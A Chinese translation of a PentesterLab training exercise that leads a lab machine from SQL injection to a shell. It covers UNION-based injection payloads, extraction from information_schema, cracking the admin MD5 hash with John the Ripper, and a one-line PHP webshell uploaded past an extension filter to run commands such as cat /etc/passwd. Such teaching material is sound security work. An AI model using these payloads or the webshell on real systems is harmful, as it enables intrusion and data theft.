翻译:https://pentesterlab.com/exercises/from_sqli_to_shell/course
本练习解释如何通过SQL注入访问管理控制台,然后在管理控制台中,解释如何在系统上运行命令。
介绍
本课程详细介绍了在基于PHP的网站中利用SQL注入进行攻击的情况,以及攻击者如何使用SQL注入访问管理页面。
然后,使用此访问权限,攻击者将能够在服务器上执行代码。
攻击分为3个步骤:
1.指纹识别:收集有关web应用程序和使用中的技术的信息。
2.SQL注入的检测和利用:在这一部分中,您将了解SQL注入是如何工作的,以及如何利用它们来检索信息。
3.访问管理页面和代码执行:访问操作系统和运行命令的最后一步。
指纹识别
可以使用多种工具进行指纹识别。首先,通过使用浏览器,可以检测到应用程序是用PHP编写的。
检查HTTP标头
通过使用netcat或telnet连接到web应用程序,可以检索大量信息:
代码语言:javascript复制$ telnet vulnerable 80
其中:
- vulnerable是服务器的主机名或IP地址;
- 80是web应用程序使用的TCP端口(80是HTTP的默认值)。
通过发送以下HTTP请求:
代码语言:javascript复制GET / HTTP/1.1
Host: vulnerable
只需观察服务器返回的HTTP头,就可以检索有关PHP版本和所用web服务器的信息
代码语言:javascript复制HTTP/1.1 200 OK
Date: Thu, 24 Nov 2011 04:40:51 GMT
Server: Apache/2.2.16 (Debian)
X-Powered-By: PHP/5.3.3-7 squeeze3
Vary: Accept-Encoding
Content-Length: 1335
Content-Type: text/html
在这里,应用程序仅通过HTTP可用(端口443上没有运行任何内容)。如果应用程序仅通过HTTPs可用,telnet或netcat将无法与服务器通信,则可以使用openssl工具:
代码语言:javascript复制$ openssl s_client -connect vulnerable:443
其中:
- vulnerable是服务器的主机名或IP地址;
- 443是web应用程序使用的TCP端口(443是HTTPs的默认值)
使用Burp Suite等应用程序http://portswigger.net/设置为代理可以轻松检索相同的信息:
使用目录拦截器
工具wfuzz(http://www.edge-security.com/wfuzz.php)可以使用蛮力检测web服务器上的目录和页面。可以运行以下命令来检测远程文件和目录:
代码语言:javascript复制$ python wfuzz.py -c -z file,wordlist/general/big.txt --hc 404 http://vulnerable/FUZZ
使用以下选项:
-c输出颜色。
-z文件,字列表/常规/大。txt告诉wfuzz使用wordlist/general/big文件。
txt作为字典来强制远程目录的名称。
--如果响应代码为404(未找到页面),hc 404告诉wfuzz忽略响应
http://vulnerable/FUZZ告诉wfuzz用字典中找到的每个值替换URL中的FUZZ一词。
在某些系统上,可能需要用wfuzz替换python wfuzz.py |
---|
Wfuzz还可用于检测服务器上的PHP脚本:
代码语言:javascript复制$ python wfuzz.py -z file -f commons.txt --hc 404 http://vulnerable/FUZZ.php
SQL注入的检测与利用
SQL注入检测
SQL简介
为了理解、检测和利用SQL注入,您需要了解结构化查询语言(SQL)。SQL允许开发人员执行以下请求:
- 使用SELECT语句检索信息;
- 使用UPDATE语句更新信息;
- 使用INSERT语句添加新信息;
- 使用DELETE语句删除信息。
更多操作(创建/删除/修改表、数据库或触发器)可用,但不太可能在web应用程序中使用。
网站最常用的查询是SELECT语句,用于从数据库中检索信息。SELECT语句遵循以下语法:
代码语言:javascript复制SELECT column1, column2, column3 FROM table1 WHERE column4='string1' AND column5=integer1 AND column6=integer2;
在此查询中,将向数据库提供以下信息:
- SELECT语句指示要执行的操作:检索信息;
- 列列表指示所需的列;
- FROM table1指示从哪些表中提取记录;
- WHERE语句后面的条件用于指示记录应满足的条件。
string1值由一个简单的引号分隔,整数integer1和integer2可以由一个简单的引号(integer2)分隔,也可以直接放入查询中(integer1)。
例如,让我们看看请求是什么:
代码语言:javascript复制SELECT column1, column2, column3 FROM table1 WHERE column4='user' AND column5=3 AND column6=4;
将从下表中检索:
column1 | column2 | column3 | column4 | column5 | column6 |
---|---|---|---|---|---|
1 | test | Paul | user | 3 | 13 |
2 | test1 | Robert | user | 3 | 4 |
3 | test33 | Super | user | 3 | 4 |
使用前面的查询,将检索以下结果:
umn1 | column2 | column3 |
---|---|---|
2 | test1 | Robert |
3 | test33 | Super |
如我们所见,只返回这些值,因为它们是唯一匹配WHERE语句中所有条件的值。
如果您阅读了处理某些数据库的源代码,您经常会看到SELECT * FROM tablename。*是一个通配符,要求数据库返回所有列,避免需要对所有列进行命名。
基于整数的检测
由于会显示错误消息,因此很容易检测到网站中的任何漏洞。可以使用以下任何和所有方法检测SQL注入。
所有这些方法都基于数据库的一般行为,发现和利用SQL注入取决于许多不同的因素,尽管这些方法本身并不是百分之百可靠的。这就是为什么您可能需要尝试其中几个,以确保给定的参数易受攻击。
让我们以一个购物网站为例,在访问URL /cat.php?id=1,您将看到图片article1。下表显示了不同id值的情况:
所有这些方法都基于数据库的一般行为,发现和利用SQL注入取决于许多不同的因素,尽管这些方法本身并不是百分之百可靠的。这就是为什么您可能需要尝试其中几个,以确保给定的参数易受攻击。 |
---|
URL | Article displayed |
---|---|
/article.php?id=1 | Article 1 |
/article.php?id=2 | Article 2 |
/article.php?id=3 | Article 3 |
PHP 对应的代码是:
代码语言:javascript复制<%?
$id = $_GET["id"];
$result= mysql_query("SELECT * FROM articles WHERE id=".$id);
$row = mysql_fetch_assoc($result);
// ... display of an article from the query result ...
?>
用户提供的值(`$_GET["id]`)直接在SQL请求中回显。例如,访问URL: * `/article.php?id=1`将生成以下请求:'SELECT * FROM articles WHERE id=1` * `/article.php?id=2`将生成以下请求'SELECT * FROM articles WHERE id=2`如果用户尝试访问URL'/article.php?id=2'',将执行以下请求' SELECT * FROM articles WHERE id=2''。但是,由于单引号'',此SQL请求的语法不正确,数据库将抛出错误。例如,MySQL将抛出以下错误消息:
代码语言:javascript复制You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server
version for the right syntax to use near
''' at line 1
此错误消息在HTTP响应中可能可见,也可能不可见,具体取决于PHP配置。
URL中提供的值直接在请求中回显,并被视为整数,这允许您请求数据库为您执行基本的数学运算:
- 如果您尝试访问/article.php?id=2-1,将向数据库发送以下请求SELECT * FROM articles WHERE id=2-1,并且由于上一个查询相当于(数据库将自动执行减法),SELECT * FROM articles WHERE id=1因此article1的信息将显示在网页中。
- 如果尝试访问/article.php?id=2-0,将向数据库发送以下请求SELECT * FROM articlesWHERE id=2-0,并且由于上一个查询相当于SELECT * FROM articles WHERE id=2,因此第2条的信息将显示在网页中。 这些属性提供了一种检测SQL注入的好方法
- 如果访问/article.php?id=2-1显示article1和通过/article.php?id=2-0显示article2,减法由数据库执行,您可能已经找到了SQL注入。
- 如果访问/article.php?id=2-1显示article2和通过/article.php?id=2-0也显示了article2,不太可能对整数进行SQL注入,但可以对字符串值进行SQL注入,我们将看到这一点。
- 如果在URL(/article.php?id=1')中添加了引号,则应该会收到一个错误。
即使值是整数(例如categorie.php?id=1),也可以在SQL查询中用作字符串:SELECT * FROM categories where id='1'.。SQL允许这两种语法,但是在SQL语句中使用字符串要比使用整数慢。 |
---|
字符串检测
正如我们在前面的"SQL简介"中所看到的,SQL查询中的字符串在用作值时放在引号之间(例如"test"):
SELECT id,name FROM users where name='test';
如果网页中存在SQL注入,则注入单个引号将破坏查询语法并生成错误。此外,将一个引号''插入2次将不再中断查询。一般来说,奇数个单引号会引发错误,偶数个单引号不会引发错误。
还可以注释掉查询的结尾,因此在大多数情况下不会出现错误(取决于查询格式)。要注释掉查询的结尾,可以使用'-'。
例如,在测试值中包含注入点的查询:
代码语言:javascript复制SELECT id,name FROM users where name='test' and id=3;
将成为:
代码语言:javascript复制SELECT id,name FROM users where name='test' -- ' and id=3;
并将被解释为:
代码语言:javascript复制SELECT id,name FROM users where name='test'
但是,如果查询遵循以下模式,此测试仍会生成错误:
代码语言:javascript复制SELECT id,name FROM users where ( name='test' and id=3 );
因为一旦查询结束被注释掉,右括号就会丢失。显然,您可以尝试使用一个或多个括号来查找不会产生错误的值。
另一种测试方法是使用"and"和"1"="1",这种注入不太可能影响查询,因为它不太可能破坏查询。例如,如果在前面的查询中注入,我们可以看到语法仍然正确:
代码语言:javascript复制SELECT id,name FROM users where ( name='test' and '1'='1' and id=3 );
此外,"and"和"1"="1"不太可能影响请求的语义,有无注入的结果可能相同。然后,我们可以将其与使用以下注入生成的页面进行比较,并且"1"="0"不太可能创建错误,但可能会更改查询的语义。
SQL注入不是一门精确的科学,很多事情都会影响测试结果。如果您认为发生了什么事情,请继续进行注入,并尝试找出代码对您的注入所做的操作,以确保它是SQL注入。
SQL注入不是一门精确的科学,很多事情都会影响测试结果。如果您认为发生了什么事情,请继续进行注入,并尝试找出代码对您的注入所做的操作,以确保它是SQL注入。 |
---|
为了找到SQL注入,您需要访问该网站,并在每个页面的所有参数上尝试这些方法。找到SQL注入后,可以转到下一节学习如何利用它。
利用SQL注入
现在,我们在页面中找到了一个SQL注入http://vulnerable/cat.php,为了更进一步,我们需要利用它来检索信息。为此,我们需要了解SQL中可用的UNION关键字。
UNION关键字
UNION语句用于汇集来自两个请求的信息:
SELECT * FROM articles WHERE id=3 UNION SELECT ...
由于它用于从其他表检索信息,因此可以将其用作SQL注入负载。攻击者无法直接修改查询的开头,因为它是由PHP代码生成的。但是,通过使用UNION,攻击者可以操纵查询结束并从其他表检索信息:
代码语言:javascript复制SELECT id,name,price FROM articles WHERE id=3 UNION SELECT id,login,password FROM users
最重要的规则是,两条语句都应返回相同的列数,否则数据库将触发错误。
使用UNION开发SQL注入
使用UNION开发SQL注入的步骤如下:
- 查找要执行并集的列数
- 查找页面中回显的列
- 从数据库元表中检索信息
- 从其他表/数据库检索信息
为了通过SQL注入执行请求,需要找到查询第一部分返回的列数。除非你有应用程序的源代码,否则你必须猜测这个数字。
有两种方法可以获取此信息:
- 使用UNION SELECT并增加列数;
- 使用ORDER BY语句。
如果尝试进行联合,并且两个查询返回的列数不同,则数据库将抛出错误:
代码语言:javascript复制The used SELECT statements have a different number of columns
可以使用此属性猜测列数。例如,如果可以插入以下查询:
代码语言:javascript复制SELECT id,name,price FROM articles where id=1.
您将尝试以下步骤:
- SELECT id,name,price FROM articles where id=1 UNION SELECT 1,
注入1 UNION SELECT 1将返回错误,因为查询的两个子部分中的列数不同;
- SELECT id,name,price FROM articles where id=1 UNION SELECT 1,2,
出于与上述相同的原因,有效负载1 UNION SELECT 1,2 将返回错误;SELECTid,name,price FROM articles where id=1 UNION SELECT 1,2,3,
因为两个子部分的列数相同,所以此查询不会引发错误。您甚至可以在页面或页面源代码中看到其中一个数字。
注意:这适用于MySQL。其他数据库的方法不同,值为1、2、3…,应更改为null、null、null…对于在UNION关键字的两侧需要相同类型值的数据库。对于Oracle,当使用SELECT时,需要使用关键字FROM,可以使用dual表来完成请求:
代码语言:javascript复制UNION SELECT null、null、null FROM dual
另一个方法使用关键字ORDER BY。ORDER BY主要用于告诉数据库应该使用哪个列对结果进行排序:
代码语言:javascript复制SELECT firstname,lastname,age,groups FROM users ORDER BY firstname
上面的请求将返回按firstname列排序的用户。
ORDER BY还可以用于与整数一起使用,以告知数据库按列号X排序:
代码语言:javascript复制SELECT firstname,lastname,age,groups FROM users ORDER BY 3
上面的请求将返回按第三列排序的用户。
此功能可用于检测列数,如果ORDER BY语句中的列数大于查询中的列数,则会引发错误(例如10):
代码语言:javascript复制Unknown column '10' in 'order clause'
可以使用此属性猜测列数。例如,如果可以插入以下查询:SELECT id,name,price FROM articles where id=1;
您可以尝试以下步骤:
- SELECT id,name,price FROM articles where id=1 ORDER BY 5注入1 ORDER BY 5将返回错误,因为查询的第一部分中的列数小于5;
- SELECT id,name,price FROM articles where id=1 ORDER BY 3注入1 ORDER BY 3不会返回错误,因为查询的第一部分中的列数小于或等于3;
- SELECT id,name,price FROM articles where id=1 ORDER BY 4注入ORDER BY 4将返回错误,因为查询的第一部分中的列数小于4;
基于这种二分法搜索,我们知道列数为3,现在可以使用此信息构建最终查询:SELECT id,name,price FROM articles where id=1 UNION SELECT 1,2,3即使此方法为本例提供了相同数量的请求,但只要列数增加,它的速度就会显著加快。
正在检索信息
现在我们知道了列的数量,可以从数据库中检索信息了。根据我们收到的错误消息,我们知道使用的后端数据库是MySQL。
使用此信息,我们可以强制数据库执行功能或向我们发送信息:
PHP应用程序使用current_user()连接到数据库的用户
使用version()的数据库版本
为了执行此操作,我们需要将前面语句(UNION SELECT 1,2,3)中的一个值替换为要运行的函数,以便在响应中检索结果。
在尝试检索信息时,请确保始终保持正确的列数。 |
---|
例如,您可以访问以下URL来检索此信息:
- 数据库版本:http://vulnerable/cat.php?id=1 UNION SELECT 1,@@version,3,4
- 当前用户:http://vulnerable/cat.php?id=1 UNION SELECT 1,current_user(),3,4
- 当前数据库:http://vulnerable/cat.php?id=1 UNION SELECT 1,database(),3,4
我们现在可以从数据库中检索信息并检索任意内容。为了检索与当前应用程序相关的信息,我们需要:
- 当前数据库中所有表的名称
- 要从中检索信息的表的列名称
MySQL提供的表包含自MySQL版本5以来可用的数据库、表和列的元信息。我们将使用这些表来检索构建最终请求所需的信息。这些表存储在information_schema中。
以下查询可用于检索:
- 所有表的列表:SELECT table_name FROM information_schema.table;
- 所有列的列表:SELECT column_name FROM information_schema.columns;
通过混合使用这些查询和以前的URL,您可以猜测要访问哪个页面来检索信息:
表格列表:1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables
列列表:1 UNION SELECT 1,column_name,3,4 FROM information_schema.columns
问题是这些请求为您提供了所有表和列的原始列表,但要查询数据库并检索有趣的信息,您需要知道哪些列属于哪个表。希望是表information_schema.columns。列存储表名:
代码语言:javascript复制SELECT table_name,column_name FROM information_schema.columns
要检索此信息,我们可以
将tablename和columnname放在注入的不同部分:1 UNION SELECT 1, table_name, column_name,4 FROM information_schema.columns
使用关键字CONCAT:1 UNION SELECT 1,concat(table_name,':', column_name),3,4 FROM information_schema.columns. ':'
将tablename和columnname连接在注入的同一部分中,以便能够轻松拆分查询结果。
如果要使用正则表达式轻松地从结果页检索信息(例如,如果要编写SQL注入脚本),可以在注入中使用标记:``1 UNION SELECT 1,concat('^^^',table_name,':',column_name,'^^^') FROM information_schema.columns`。然后很容易在页面中匹配结果。 |
---|
SQL注入提供了与应用程序用于连接到数据库的用户(current_user())...相同的访问级别这就是为什么在部署web应用程序时,为该用户提供尽可能最低的权限总是很重要的原因。
访问管理页面和代码执行破解密码
可以使用两种不同的方法轻松破解密码:
- 搜索引擎
- 开膛手约翰 http://www.openwall.com/john/
当一个散列是不加盐的,它可以很容易地用谷歌这样的搜索引擎破解。为此,只需搜索哈希,您就会看到许多网站上都有您密码的明文版本:
John The Ripper可用于破解此密码,大多数现代Linux发行版都包含John的一个版本,为了破解此密码,您需要告诉John使用了什么算法对其进行加密。对于web应用程序,一个很好的猜测是MD5。
在大多数Linux发行版中,John the Ripper提供的版本只支持少量格式。您可以不带任何参数运行john,从使用信息中获取受支持格式的列表。例如,在Fedora上,支持以下格式:
代码语言:javascript复制$ john
# ...usage information...
--format=NAME force hash type NAME: DES/BSDI/MD5/BF/AFS/LM/crypt
# ...usage information...
遗憾的是,可用的MD5不是PHP函数MD5创建的格式。为了破解此密码,我们需要一个支持raw-md5的John版本。主网站上提供的社区增强版支持raw-md5,可以使用。
现在,我们需要以正确的格式为John提供信息,我们需要将用户名和密码放在同一行上,并用冒号 ':'分隔。
代码语言:javascript复制admin:8efe310f9ab3efeae8d410a8e0166eb2
可以使用以下命令行破解以前检索到的密码:
代码语言:javascript复制$ ./john password --format=raw-md5 --wordlist=dico --rules
使用以下选项:
- password告诉john哪个文件包含密码哈希
- --format=raw-md5告诉john密码哈希是raw-md5格式
- --wordlist=dico告诉john将dico文件用作字典
- --rules告诉john为提供的每个单词尝试变体
John输出与所用格式匹配的哈希数:
代码语言:javascript复制Loaded 1 password hash (Raw MD5 [SSE2 16x4x2 (intr)])
这表明使用了正确的格式。
您可以快速检索密码:
代码语言:javascript复制$ ./john password --format=raw-md5 --wordlist=dico --rules
Loaded 1 password hash (Raw MD5 [SSE2 16x4x2 (intr)])
P4ssw0rd (admin)
上载Webshell和代码执行
一旦获得对管理页面的访问权限,下一个目标就是找到在操作系统上执行命令的方法。
我们可以看到,有一个文件上传功能允许用户上传图片,我们可以使用此功能尝试上传PHP脚本。这个PHP脚本一旦上传到服务器上,将为我们提供一种运行PHP代码和命令的方法。
首先,我们需要创建一个PHP脚本来运行命令。下面是一个简单且最小的webshell的源代码:
代码语言:javascript复制 <?
system($_GET['cmd']);
?>
此脚本获取参数cmd的内容并执行它。它需要保存为扩展名为的file.php,例如:shell.php可用作文件名。
我们现在可以使用页面上提供的上载功能:http://vulnerable/admin/new.php并尝试上载此脚本。
我们可以看到,脚本没有正确上传到服务器上。应用程序阻止扩展名为的文件。要上载的php。但是,我们可以尝试:
.php3将绕过一个简单的过滤器.php
.php。将绕过简单过滤器的测试.php和Apache仍将使用.php,因为在此配置中,它没有用于的处理程序.test
现在,我们需要找到管理上传的PHP脚本将文件放在web服务器上的位置。我们需要确保该文件可直接用于web客户端。我们可以访问新上传图像的网页,查看<img标记指向的位置:< span=""></img标记指向的位置:<>
代码语言:javascript复制<divclass="content">
<h2>Lastpicture: Test shell</h2>
<divalign="center">
<p>
<img src="admin/uploads/shell.php3"alt="Test shell" /> </p>
</div>
</div>
现在,您可以访问以下地址的页面,并开始使用cmd参数运行命令。例如,访问http://vulnerable/admin/uploads/shell.php3?cmd=uname将在操作系统上运行uname命令并返回当前内核(Linux)。
其他命令可用于检索更多信息:
- cat/etc/passwd获取系统用户的完整列表;
- uname -a获取当前内核的版本;
- ls获取当前目录的内容;
- …
webshell与运行PHP脚本的web服务器具有相同的权限,例如,您将无法检索文件/etc/shadow的内容,因为web服务器无权访问此文件(但是,您仍应尝试,以防管理员出错并更改了此文件的权限)。
每个命令都独立于前一个命令在全新的上下文中运行,您将无法通过运行/etc/shadow和ls来获取/etc/目录的内容.
结论
本练习向您展示了如何手动检测和利用SQL注入来访问管理页面。一旦进入“受信任区域”,通常会有更多的功能可用,这可能会导致更多的漏洞。
此练习基于几年前在一个网站上进行的渗透测试的结果,但具有此类漏洞的网站今天仍然可以在互联网上找到。
所提供的web服务器的配置是一种理想的情况,因为会显示错误消息,并且关闭PHP保护。我们将在另一个练习中看到如何在更困难的条件下利用SQL注入,但与此同时,您可以使用PHP配置来强化练习。为此,您需要启用magic_quotes_gpc并禁用PHP配置中的display_errors错误(/etc/php5/apache2/php.ini),然后重新启动web服务器(/etc/init.d/apache2 restart)